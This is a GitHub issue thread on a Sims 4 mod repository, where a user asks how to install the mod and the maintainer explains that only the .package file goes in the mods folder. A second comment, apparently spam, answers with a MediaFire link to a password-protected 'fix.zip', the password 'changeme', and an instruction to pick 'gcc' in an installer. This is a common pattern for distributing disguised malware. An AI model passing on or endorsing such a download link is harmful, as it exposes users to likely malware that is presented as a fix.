### ISSUE TITLE
One question

### ISSUE THREAD

**Issue by GoneWithTheWins** [quiet-bird/goldenwhims#2]
Should you install the Python files into the Sims 4 Mods folder?

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by quiet-bird** [comment]
No, just put the `Quietbird_GoldenWhims.package` file in your mods folder. Eventually there will be a single `.ts4script` file to go along with it, at which point I'll make a release so that it's easy to download and I'll add install instructions in the README to demonstrate.
